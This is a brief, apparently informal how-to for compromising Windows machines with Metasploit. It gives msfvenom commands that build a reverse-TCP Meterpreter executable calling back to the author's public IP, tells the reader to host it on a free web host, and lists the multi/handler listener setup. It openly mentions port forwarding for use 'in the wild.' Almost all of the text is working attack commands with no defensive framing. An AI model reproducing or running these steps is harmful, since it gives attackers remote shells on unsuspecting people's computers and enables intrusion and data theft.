So the last time I did this I hosted the payload on a server on my pc, now you can just use
port forward 8888 (If you plan on using this in the wild)
Create the payload
cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe
Host the Payload on 000webhost.com (Just make an account and upload the payload using the file manager).
Start your listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j